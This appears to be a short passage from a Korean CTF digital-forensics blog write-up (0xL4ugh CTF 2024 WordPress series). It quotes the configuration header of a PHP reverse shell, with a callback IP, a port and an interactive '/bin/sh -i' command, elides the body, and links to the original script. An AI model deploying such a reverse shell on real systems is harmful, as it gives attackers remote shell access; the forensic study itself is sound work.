들어가기에 앞서
마지막에 Reference 링크가 첨부되어있다.
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '172.26.211.155'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
...
?>
원본 역방향 쉘 스크립트는
→ https://github.com/xdayeh/Php-Reverse-Shell/blob/master/PHP-Reverse-Shell.php
여기서 확인 가능하다.
→ https://github.com/xdayeh/Php-Reverse-Shell/blob/master/PHP-Reverse-Shell.php
'CTF > Digital Forensic' 카테고리의 다른 글
[0xL4ugh CTF 2024] WordPress - 3_Write-up (0) | 2024.05.30 |
---|---|
[0xL4ugh CTF 2024] WordPress - 2_Write-up (0) | 2024.05.30 |
[0xL4ugh CTF 2024] WordPress - 1_Write-up (0) | 2024.05.30 |
[TetCTF 2024] TET & 4N6_Write-up (1) | 2024.02.04 |